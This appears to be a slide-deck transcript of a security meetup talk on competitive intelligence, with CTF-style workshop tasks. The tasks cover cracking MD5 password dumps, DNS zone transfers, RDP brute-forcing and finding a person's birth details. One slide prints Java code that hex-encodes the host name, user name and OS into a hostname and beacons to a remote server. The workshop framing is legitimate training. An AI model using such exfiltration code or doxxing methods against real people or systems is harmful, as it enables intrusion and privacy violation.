Presentation in SoftServe's Security Hole #11 about competitive intelligence for people and enterprise, risks and it's use in business. + Workshop for audience

2. Competitive Intelligence –
Competitor's Fatality
Igor Beliaiev

3. What is Competitive Intelligence(CI)?

5. Basic methods

11. Start is here: goo.gl/ygm51k
Інфо ебаут хак
The Workshop

12. Task #1. Intro
We know that Mikko Kuttonen is using github.
His github for working staff is mikkoKut1
You have to find his password for the home media
server(107.170.*.*).

13. Task #2. Pakistani
There is a hacker from Pakistan. He is paid for
hunting for a different journalists, that show how
things in Ukraine are going on during the revolution.
We have some information about his last attacks, so
we have to find out what he has done with his
victims.

14. We have some dump with journalist's accounts on
times.com. (times.zip)
Let's find any password, that he could hack. We
know that only one of those accounts got hacked, so
we have to find the easiest password.
Task #2. Pakistani
Hint! Journalist’s passwords are encrypted with
MD5 algorithm
Hint! You can use MD5 online decoders

15. Task #3. Archive
As you can see, we also have another archive with
file zik.doc, which we need, but it's encrypted.
We need to read the data from zikua.doc
Hint! Look carefully for the files in archives.
Are there any common things?
Hint! You might also use some tools, which you
have got with the tasks. But remember, you don’t
have much time.

16. Task #4. Zik.ua
From the previous task we have got information, that
there are some important files on torrent server on
a*****.zik.ua
We need to find the subdomain and torrent server.
Hint! DNS-requests might help you
Hint! You can try to use AXFR-requests

17. $1mln/month
ValveSoftware.com

20. Task #5. Find the hacker
Finally we managed to find the real IP address of
Pakistani hacker, and even bruteforce his RDP
password.
We started to download his private files, but
suddenly connection was lost...forever.
We managed to download only one file.
Using this file, find the name of the hacker!

21. Task #5. Find the hacker

22. • Nickname: johnsmith@athc.biz
• Find his place and date of birth
Tasks from PHDays

23. Tasks from PHDays

24. Tasks from PHDays

25. Tasks from PHDays

26. Tasks from PHDays
String str1 = System.getProperty("os.name");
String str2 = System.getProperty("user.name");
InetAddress localInetAddress2 = InetAddress.getLocalHost();
InetAddress[] arrayOfInetAddress =
InetAddress.getAllByName(localInetAddress2.getCanonicalHostName());
String str3 = arrayOfInetAddress[0].toString();
InetAddress localInetAddress1 = InetAddress.getLocalHost();
String str4 = localInetAddress1.getHostName();
String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) +
toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes());
if (str5.length() > 63) {
str5 = str5.substring(0, 63);
}
Socket localSocket = new Socket(str5 + paramString2, 80);
String str6 = readAll(localSocket);
String str7 = "access=true";
if (str6.contains(str7)) {
localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" +
str3 + "&file=/", 80);

27. Tasks from PHDays
+ WebRTC (net.ipcalf.com)

28. Tasks from PHDays

29. ? ?